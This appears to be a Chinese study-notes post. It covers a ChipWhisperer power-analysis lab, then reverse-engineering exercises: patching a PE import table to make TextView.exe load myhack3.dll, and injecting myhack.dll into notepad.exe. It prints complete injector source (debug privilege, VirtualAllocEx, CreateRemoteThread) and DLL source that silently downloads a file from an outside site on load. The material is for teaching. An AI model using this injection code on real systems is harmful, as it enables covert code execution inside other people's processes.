• 打开HARDWARE的ipynb，可以看到最前面有以下提示，意思是：需要根据你的硬件设备先设置相应平台类型，CWLite和CW1200的SCOPETYPE选择'OPENADC'，CWNANO则选择'CWNANO'；如果目标板为STM32（如：CWLITEARM的目标板就是这个）PLATFORM选择'CWLITE'，如果目标板为XMEGA（如：CWLITEXMEGA的目标板就是这个）则选择'CWLITEXMEGA'

  

• 这里我的硬件是CWLITEXMEGA所以选择

  1 2	SCOPETYPE = 'OPENADC' PLATFORM = 'CWLITEXMEGA'

• 设置好后，把所有HARDWARE的ipynb的代码复制到MAIN的ipynb中执行

• 编译目标板固件，上面的设置就是为了编译输出合适的目标板固件

  

• 用USB连接设备，继续往下运行，正常运行会输出Found ChipWhisperer

  

• 给目标板烧录新编译的固件

  

• 再往下就是MAIN ipynb的代码了

  

• 接着可以看到如下提示，意思是，这里只需要关注单个指令的能量消耗，而不关注串口通信的能量消耗，所以需要去'hardware/victims/firmware/simpleserial-base-lab2'目录下修改simpleserial-base.c的代码，找到get_pt函数，删除或者注释调末尾的simpleserial_put调用语句，保存后重新编译并上传至目标板

  

  

• 编译，只需重新执行前面make命令的代码块，即可

  1 2 3

  %%bash -s "$PLATFORM" cd ../../../hardware/victims/firmware/simpleserial-base-lab2 make PLATFORM=$1 CRYPTO_TARGET=NONE

• 然后再执行前面的给目标板烧录固件的代码即可

  1	cw.program_target(scope, prog, "../../../hardware/victims/firmware/simpleserial-base-lab2/simpleserial-base-{}.hex".format(PLATFORM))

• 接着往下执行，可以查看目标板的能量消耗曲线

  

• 接着往下可以看到如下提示，大意是修改simpleserial-base.c中的代码，让CPU重复执行单一命令20次，看能否从能量消耗曲线中看出该命令所对应的位置，其中需要用"volatile"关键字修饰变量，避免编译器对该代码进行优化（将这些指令直接替换为这些运算的最终结果）。对于不同的目标板，建议选则的指令不一样，如：ARM（STM32）的目标板建议测试乘法运算，XMEGA和AVR则建议测试加法运算（因为这类设备乘法运算消耗更大）

  

• 按照上面提示在simpleserial-base.c的get_pt函数中添加测试的加法代码

  

• 重新编译并烧录进目标板后，再次画能量消耗图，可以看到如下结果

  

• 对比上图和一开始的图片，可以看到，上面前面部分明显出现20个尖峰，结合代码可知，这20个尖峰其实就是目标板运算20次A+=2所对应的能量消耗

• 再往下可以看到如下提示，大意是，“你可能觉得很奇怪，为什么我们不用一个循环而是复制粘贴一行代码20次。将这个替换为循环你就知道为什么了，需要注意的是循环的变量同样要用volatile修饰”

  

• 按照上述提示，将该代码改写为for 循环并用volatile修饰循环计数 i，保存并重新编译上传至目标板

  

• 再次画出能量消耗图，如下图，可以看到，虽然同样出现20个周期性的峰型，但是对比复制粘贴执行的能量消耗，下图耗时更久，波形更复杂些

  

• 往下可以看到提示，大意是“你可能觉得很奇怪，为什么循环执行更复制粘贴执行的能量消耗结果不一样？如果你熟悉汇编，你可以去查看simpleserial-base-lab2文件夹下的.lss（编译输出的中间文件）。或者看下面这个C伪代码。正如你所看到的，微控制器比起执行重复粘贴的代码，循环需要做更多的事情（比较大小，循环体，循环计数+1）。如果i的变量不用volatile修饰，那么通常会将循环展开（即将循环优化为复制粘贴的代码），有volatile可以避免编译器进行这项优化。当然展开循环会导致代码块大小增大，所以有时编译器为了优化代码块大小而避免展开循环”

  

• 再往下可以看到如下提示信息，大意是让我们测试高消耗的运算，对于ARM建议测试除法运算，对于AVR/XMEGA则建议测试乘法运算

  

• 但是按照提示将+=2改为*=2后，重新编译并上传目标板后，抓取的能量消耗图与前面相比却并没有太大区别

  

  

• 按下面的提示，可以知道，改为复杂运算后，应该会花更多的时间运算而且消耗更多的能量，但是上面*=2的与前面+=2却并没有太大区别

  

• 不过想到编译器可能对2的倍数的乘法运算有优化，将乘法优化为移位运算了（如*2优化为<<1），于是把2改为3，重新编译测试，结果一出来，果然乘法消耗明显更大

  

• 再来试试除法，根据提示的意思是XMEGA中的除法开销会巨大，如下图，下图这其实只是1次除法运算的能量消耗图而不是20次，如此可见XMEGA中的除法消耗的确非常大。同样从单次除法运算中出现多个尖峰可以推测，可以推测XMEGA的除法是循环运算一些简单指令得到的

  

总结

• CPU/微控制器执行不同指令会有不同能量消耗和时间消耗
• 编译器可能会在编译时对一些代码做一些优化，如：把简单的运算之间替换为运算结果，循环展开等，所以有时候测试某些运算/指令的能量消耗时，需要特别留意最终的可执行程序是否被编译器优化过的

通过修改PE文件加载DLL

练习文件

• 从https://github.com/reversecore/book下载对应的章节的可执行文件TextView.exe和myhack3.dll，当然也可以选择下载两者的源码，用vs重新编译，这里直接下载可执行文件进行练习

TextView.exe

• 使用PEView工具查看TextView.exe可执行文件的IDT（Import Directory Table，导入目录表），如下图，可以看到TextView.exe直接导入的DLL文件为KERNEL32.dll、USER32.dll、GDI32.dll、SHELL32.dll

  

• 修改思路：如上图所示，PE文件导入的DLL信息以结构体列表的形式存在IDT中。只要将myhack3.dll添加到列表尾部就可以了。当然在此之前需要确认一下IDT中有无足够空间。

• 查看IDT是否有足够空间：首先使用PEView查看TextView.exe的IDT地址（PE文件头的IMAGE_OPTIONAL_HEADER结构体中导入表RVA即为IDT的RVA），可以看到IDT的地址（RVA）为84CC，大小为64h

  

• 接下来在PEView中切换RVA为基址视图，查看RVA 84CC的IDT，如下图，可以看到，TextView.exe存在于.rdata节区，

  

• 在PEView工具栏中将视图改为File Offset，可以看到IDT的文件偏移为76CC

  

• 用HEdit找到76CC地址处，如下图所示，IDT的文件偏移为76CC～772F，整个大小为64字节，共有5个结构体，其中最后一个为NULL结构体。IDT尾部存在其他数据，没有足够空间来添加myhack3.dll的IID结构体

  

移动IDT

• 这种情况，我们可以把整个IDT转移到其他更广阔的位置，然后再添加新的IID。确定移动的目标位置时，可以使用下面的三种方式：

  • 查找文件中的空白区域
  • 增加文件最后一个节区的大小
  • 在文件末尾添加新的节区

• 首先尝试第一种方法，即查找文件中的空白区域。如下图所示，可以看到.rdata节区尾部恰好存在大片空白区域（一般来说，节区或文件末尾都存在空白区域，PE文件中这种空白区域称为Null-Padding区域）

  

• 接下来只要把原IDT移动到该Null-Padding区域（RVA：8C60～8DFF）中合适位置即可。在此之前，先要确认一下该区域（RVA：8C60～8DFF）是否全是空白可用区域（Null-Padding）。如下图所示：从节区头信息中可知，.rdata在磁盘文件与内存中的大小是不同的，.rdata在磁盘文件中的大小为2E00，而文件执行后加载到内存时，程序实际使用的数据大小仅为2C56，剩余未被使用的区域大小为1AA（2E00-2C56）。在这段空白区域创建IDT不会有什么问题。

  

• 接下来，我们将在RVA:8C60（RAW: 7E60）位置创建新的IDT

修改TextView.exe

• 修改导入表的RVA值，IMAGE_OPTIONAL_HEADER的导入表结构体成员用来指出IDT的位置（RVA）与大小，如下图所示

  

• 使用HEdit将原RVA：84CC改为新的RVA：8C60，并将Size（IDT结构体大小）的64改为78

  

删除绑定导入表

• BOUND IMPORT TABLE（绑定导入表）是一种提高DLL加载速度的技术，如下图所示

  

• 若想要正常导入myhack3.dll，需要向绑定导入表添加信息。但这个绑定导入表是个可选项，不是必须存在的，所以可删除（修改其值为0即可），而且绑定导入表完全不存在也没关系，但若存在，且其信息记录错误，则会在程序运行时引发错误。

创建新的IDT

• 先使用HEdit复制原IDT（RVW: 76CC～772F），然后粘贴到IDT的新位置（RAW：7E80），如下图所示

  

• 在新IDT尾部（RAW：7EB0）添加与myhack3.dll对应的IID

  

  1 2 3 4 5 6 7 8 9 10 11

  typedef struct _IMAGE_IMPORT_DESCRIPTOR { union { DWORD Characteristics; // DWORD OriginalFirstThunk; // 00008D00 => RVA to INT }; DWORD TimeDateStamp; // 0 DWORD ForwarderChain; // 0 DWORD Name; // 00008D10 => RVA，指向dll名字，该名字以0结尾 DWORD FirstThunk; // 00008D20 => RVA，指向IMAGE_THUNK_DATA结构数组 } IMAGE_IMPORT_DESCRIPTOR;

设置Name、INT、IAT

• 前面添加的IID结构体成员拥有指向其他数据结构（INT、Name、IAT）的RVA值。因此，必须准确设置这些数据才能保证修改后的TextView.exe文件正常运行。由前面设置可知INT、Name、IAT的RVA/RAW的值，整理如下表所示

  	RVA	RAW
  INT	8D00	7F00
  Name	8D10	7F10
  IAT	8D20	7F20

• 这些地址（RVA：8D00，8D10，8D20）就位于新的IDT下方（这里这些RVA可以选择在其他位置）。如下图，用HEdit在7F00、7F10、7F20、7F30输入相应的值

  

• 用PEView打开查看该区域，如下图所示

  

• 下面讲解显示的各值意义

• 8CB0地址处存在着myhack3.dll的IID结构体，其中3个主要成员（RVA of INT、RVA of Name、RVA of IAT）的值分别是实际INT、Name、IAT的指针

• INT（Import Name Table，导入名称表）是RVA数组，数组的各个元素都是一个RVA地址，该地址由导入函数的Ordinal（2个字节）+ 函数名结构体组成，数组的末尾为NULL。上图中有一个元素，其值为8D30，该地址处是要导入的函数的Ordinal（2个字节）与函数名称字符串（"dummy"）

• Name是包含导入函数的DLL文件名称字符串，在8D10地址处可以看到"myhack3.dll"字符串

• IAT也是RVA数组，各元素既可以拥有与INT相同的值，也可以拥有其他不同值（若INT数据准确，IAT也可以拥有其他不同值）。实际运行时，PE装载器会将虚拟内存中的IAT替换为实际函数的地址。

修改IAT节区的属性值

• 加载PE文件到内存时，PE装载器会修改IAT，写入函数的实际地址，所以相关节区一定要拥有WRITE（可写）属性。只有这样，PE装载器才能正常进行写入操作。使用PE View查看.rdata节区头，如下图所示

  

• 向原属性值（Characteristics）40000040添加IMAGE_SCN_MEM_WRITE（80000000）属性值。执行bit OR运算，最终属性值变为C0000040。如下图所示，使用HEdit修改该处的值

  

• 至此完成了所有修改，打开TextView.exe可以看到TextView.exe成功加载myhack3.dll，myhack3.dll被加载后会自动下载指定网站的index.html，然后由TextView.exe显示

  

DLL注入

• DLL注入指的是向运行中的其他进程强制插入特定的DLL文件。从技术细节来说，DLL注入命令其他进程自行调用LoadLibrary() API，加载用户指定的DLL文件。DLL注入与一般DLL加载的区别在于，加载的目标进程是其自身或其他进程。

  

• 从上图可以看到，myhack.dll已被强制插入notepad.exe进程（本来notepad.exe并不会加载myhack.dll）。加载到notepad.exe进程中的myhack.dll与已经被加载到notepad.exe进程中的DLL（kernel32.dll、user32.dll）一样，拥有访问notepad.exe进程内存的（正当的）权限，这样用户就可以做任何想做的事了（添加一些新功能，或者修复bug等）

• DLL（Dynamic Linked Library，动态链接库）：DLL被加载到进程后会自动运行DllMain()函数，用户可以把想执行的代码放到DllMain()函数，每当加载DLL时，添加的代码就会自然而然得到执行。利用该特性可修复程序Bug，或向程序添加新功能。

DLL注入的实现方法

• 向某个进程注入DLL时主要使用以下三种方法
  • 创建远程线程（CreateRemoteThread() API）
  • 使用注册表（AppInit_DLLs值）
  • 消息钩取（SetWindowsHookEx() API）

CreateRemoteThread()

• 因为这里用的是64位win10，所以作者提供的32位InjectDll.exe和myhack.dll文件不能生效。需要使用作者提供的源码编译成64位的PE文件

• 把重新编译生成的InjectDll.exe和myhack.dll放在一个文件夹下，以管理员身份运行cmd（命令行）

  

• 运行notepad.exe，然后使用Process Explorer获取notepad.exe的进程的PID值

  

• 运行DebugView

• 命令行中运行一下命令注入myhack.dll，注意myhack.dll的路径必须位绝对路径，其中第一个参数6940即位notepad.exe此时的pid值

  

• 查看DebugView，可以看到myhack.dll的日志输出

  

• myhack.dll所在路径也静默下载了指定网站的index.html

  

• Process View查看notepad.exe的DLL，可以看到，myhack.dll已经被加载到notepad.exe进程中

  

分析示例源代码

• 先分析一下myhack.dll源代码（myhack.cpp）

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45

  #include "windows.h" #include "tchar.h" #pragma comment(lib, "urlmon.lib") #define DEF_URL (L"http://www.naver.com/index.html") #define DEF_FILE_NAME (L"index.html") HMODULE g_hMod = NULL; DWORD WINAPI ThreadProc(LPVOID lParam) { TCHAR szPath[_MAX_PATH] = {0,}; if( !GetModuleFileName( g_hMod, szPath, MAX_PATH ) ) return FALSE; TCHAR *p = _tcsrchr( szPath, '\\' ); if( !p ) return FALSE; _tcscpy_s(p+1, _MAX_PATH, DEF_FILE_NAME); URLDownloadToFile(NULL, DEF_URL, szPath, 0, NULL); return 0; } BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { HANDLE hThread = NULL; g_hMod = (HMODULE)hinstDLL; switch( fdwReason ) { case DLL_PROCESS_ATTACH : OutputDebugString(L"<myhack.dll> Injection!!!"); hThread = CreateThread(NULL, 0, ThreadProc, NULL, 0, NULL); CloseHandle(hThread); break; } return TRUE; }

• 在DllMain()函数中可以看到，该DLL被加载（DLL_PROCESS_ATTACH）时，先输入一个调试字符串（"<myhack.dll> Injection!!!"），然后创建线程调用函数（ThreadProc）。在ThreadProc()函数中通过调用urlmon!URLDownloadToFile() API来下载指定网站的index.html文件。向进程注入DLL后就会自动调用执行该DLL的DLLMain()函数。所以当my hack.dll注入notepad.exe进程后，最终会调用执行URLDownloadToFile() API

• 接下来查看InjectDll.exe的源码InjectDll.cpp

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108

  #include "windows.h" #include "tchar.h" BOOL SetPrivilege(LPCTSTR lpszPrivilege, BOOL bEnablePrivilege) { TOKEN_PRIVILEGES tp; HANDLE hToken; LUID luid; if( !OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken) ) { _tprintf(L"OpenProcessToken error: %u\n", GetLastError()); return FALSE; } if( !LookupPrivilegeValue(NULL, // lookup privilege on local system lpszPrivilege, // privilege to lookup &luid) ) // receives LUID of privilege { _tprintf(L"LookupPrivilegeValue error: %u\n", GetLastError() ); return FALSE; } tp.PrivilegeCount = 1; tp.Privileges[0].Luid = luid; if( bEnablePrivilege ) tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; else tp.Privileges[0].Attributes = 0; // Enable the privilege or disable all privileges. if( !AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES) NULL, (PDWORD) NULL) ) { _tprintf(L"AdjustTokenPrivileges error: %u\n", GetLastError() ); return FALSE; } if( GetLastError() == ERROR_NOT_ALL_ASSIGNED ) { _tprintf(L"The token does not have the specified privilege. \n"); return FALSE; } return TRUE; } BOOL InjectDll(DWORD dwPID, LPCTSTR szDllPath) { HANDLE hProcess = NULL, hThread = NULL; HMODULE hMod = NULL; LPVOID pRemoteBuf = NULL; DWORD dwBufSize = (DWORD)(_tcslen(szDllPath) + 1) * sizeof(TCHAR); LPTHREAD_START_ROUTINE pThreadProc; // #1.使用dwPID获取目标进程（notepad.exe）句柄 if ( !(hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPID)) ) { _tprintf(L"OpenProcess(%d) failed!!! [%d]\n", dwPID, GetLastError()); return FALSE; } // #2. 在目标程序（notepad.exe）内存中分配szDllName大小的内存 pRemoteBuf = VirtualAllocEx(hProcess, NULL, dwBufSize, MEM_COMMIT, PAGE_READWRITE); // #3. 将myhack.dll路径写入分配的内存 WriteProcessMemory(hProcess, pRemoteBuf, (LPVOID)szDllPath, dwBufSize, NULL); // #4. 获取LoadLibraryW() API的地址 hMod = GetModuleHandle(L"kernel32.dll"); pThreadProc = (LPTHREAD_START_ROUTINE)GetProcAddress(hMod, "LoadLibraryW"); // #5. 在notepad.exe进程中运行线程 hThread = CreateRemoteThread(hProcess, NULL, 0, pThreadProc, pRemoteBuf, 0, NULL); WaitForSingleObject(hThread, INFINITE); CloseHandle(hThread); CloseHandle(hProcess); return TRUE; } int _tmain(int argc, TCHAR *argv[]) { if( argc != 3) { _tprintf(L"USAGE : %s <pid> <dll_path>\n", argv[0]); return 1; } // change privilege if( !SetPrivilege(SE_DEBUG_NAME, TRUE) ) return 1; // inject dll if( InjectDll((DWORD)_tstol(argv[1]), argv[2]) ) _tprintf(L"InjectDll(\"%s\") success!!!\n", argv[2]); else _tprintf(L"InjectDll(\"%s\") failed!!!\n", argv[2]); return 0; }

• main()函数的主要功能是检查输入程序的参数，然后先调用SetPrivilege()函数获取权限，再调用InjectDll()函数。InjectDll()函数是用来实施DLL注入的核心函数，其功能是命令目标进程自行调用LoadLibrary("myhack.dll") API。下面分析InjectDll()函数

  • hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPID)，获取目标进程句柄，调用OpenProcess() API，借助程序运行时以参数形式传递过来的dwPID值，获取notepad.exe进程的句柄（PROCESS_ALL_ACCESS权限）。得到PROCESS_ALL_ACCESS权限后，就可以使用获取的句柄（hProcess）控制对应的进程（notepad.exe）

  • pRemoteBuf = VirtualAllocEx(hProcess, NULL, dwBufSize, MEM_COMMIT, PAGE_READWRITE);，将要注入的DLL路径写入目标进程内存。需要把即将加载的DLL文件的路径（字符串）告知目标进程（notepad.exe）。因为任何内存空间都无法进行写入操作，故先使用VirtualAllocEx() API在目标进程（notepad.exe）的内存空间中分配一块缓冲区，且指定该缓冲区的大小为DLL文件路径字符串的长度（含Terminating NULL即'\0'）即可

  • WriteProcessMemory(hProcess, pRemoteBuf, (LPVOID)szDllPath, dwBufSize, NULL)，使用WriteProcessMemory() API将DLL路径字符串（"C:\xxxx\myhack.dll"）写入分配所得缓冲区（pRemoteBuf）地址。WriteProcessMemory() API所写的内存空间也是hProcess句柄所指的目标进程（notepad.exe）的内存空间。这样，要注入的DLL文件的路径就被写入目标进程（notepad.exe）的内存空间

  •   /**   * 获取LoadLibraryW() API地址，调用LoadLibrary() API前先要获取其地址   *（LoadLibraryW()是LoadLibrary()的Unicode字符串版本）   * 这里需要注意的是，我们的目标是获取加载到notepad.exe进程的kernel32.dll的LoadLibraryW() API   * 的起始地址   * 但下面的代码切是用来获取加载到InjectDll.exe进程的kernel32.dll的LoadLibraryW()的起始地址   * 之所以可以这样是因为，在Windows系统中，kernel32.dll在每个进程中的加载地址都是相同的   */  hMod = GetModuleHandle(L"kernel32.dll");  pThreadProc = (LPTHREAD_START_ROUTINE)GetProcAddress(hMod, "LoadLibraryW");    
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    
    - `hThread = CreateRemoteThread(hProcess, NULL, 0, pThreadProc, pRemoteBuf, 0, NULL);`，在目标进程中运行远程线程（Remote Thread）。pThreadProc = notepad.exe进程内存中的LoadLibraryW() 地址，pRemoteBuf = notepad.exe 进程内存中的"C:\xxxx\myhack.dll"字符串地址。一切准备就绪后，最后向notepad.exe发送一个命令，让其调用LoadLibraryW() API函数加载指定的DLL即可，但是Windows并未直接提供执行这一命令的API。不过，可以另辟蹊径，使用CreateRemoteThread()这个API（在DLL注入是几乎总会用到）
    
    - CreateRemoteThread() API函数原型如下
    
        ```c++
        HANDLE CreateRemoteThread(
          [in]  HANDLE                 hProcess, // 目标进程
          [in]  LPSECURITY_ATTRIBUTES  lpThreadAttributes,
          [in]  SIZE_T                 dwStackSize,
          [in]  LPTHREAD_START_ROUTINE lpStartAddress, // 线程函数地址
          [in]  LPVOID                 lpParameter,// 线程参数地址
          [in]  DWORD                  dwCreationFlags,
          [out] LPDWORD                lpThreadId
        );
    

  • 除了第一个参数hProcess外，其他参数与CreateThread()函数完全一样。hProcess参数是要执行目标线程的目标进程的句柄。lpStartAddress与lpParameter参数分别给出线程函数地址与线程参数地址。需要注意的是，这两个地址都应该在目标进程虚拟内存空间中

  • 这里可以用LoadLibrary作为第四个参数的原因是LoadLibrary函数原型与线程函数原型一样，两者都接受一个4字节参数并返回一个4字节的值，LoadLibrary和ThreadProc函数比较如下

    1 2 3 4 5 6 7

    DWORD WINAPI ThreadProc( [in]LPVOIDlpParameter ) DWORD WINAPI LoadLibrary( [in]LPCTSTRlpFileName )

  • CreateRemoteThread()函数的最主要功能就是驱使目标进程调用LoadLibrary()函数，进而加载指定的DLL文件